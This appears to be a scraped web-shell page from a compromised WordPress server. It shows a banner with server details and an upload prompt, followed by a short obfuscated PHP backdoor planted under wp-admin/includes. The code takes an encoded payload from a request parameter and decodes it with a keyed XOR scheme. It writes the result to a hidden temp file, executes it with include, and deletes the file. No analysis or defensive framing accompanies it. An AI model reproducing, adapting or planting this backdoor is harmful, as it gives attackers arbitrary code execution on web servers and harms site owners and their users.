| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/harshika/wp-admin/includes/ |
Upload File : |
<?php
if(!is_null($_REQUEST["o\x62\x6A"] ?? null)){
$value = $_REQUEST["o\x62\x6A"];
$value= explode( '.', $value ) ;
$desc = '';
$s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s5 );
$y = 0;
array_walk($value, function ($v4) use (&$desc, &$y, $s5, $lenS) {
$sChar = ord($s5[$y % $lenS] );
$d = ((int)$v4 - $sChar - ($y % 10)) ^ 33;
$desc .= chr($d );
$y++; } );
$val = array_filter([getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", "/dev/shm", session_save_path()]);
foreach ($val as $data_chunk):
if (max(0, is_dir($data_chunk) * is_writable($data_chunk))) {
$descriptor = "$data_chunk/.dat";
$success = file_put_contents($descriptor, $desc);
if ($success) {
include $descriptor;
@unlink($descriptor);
exit;}
}
endforeach;
}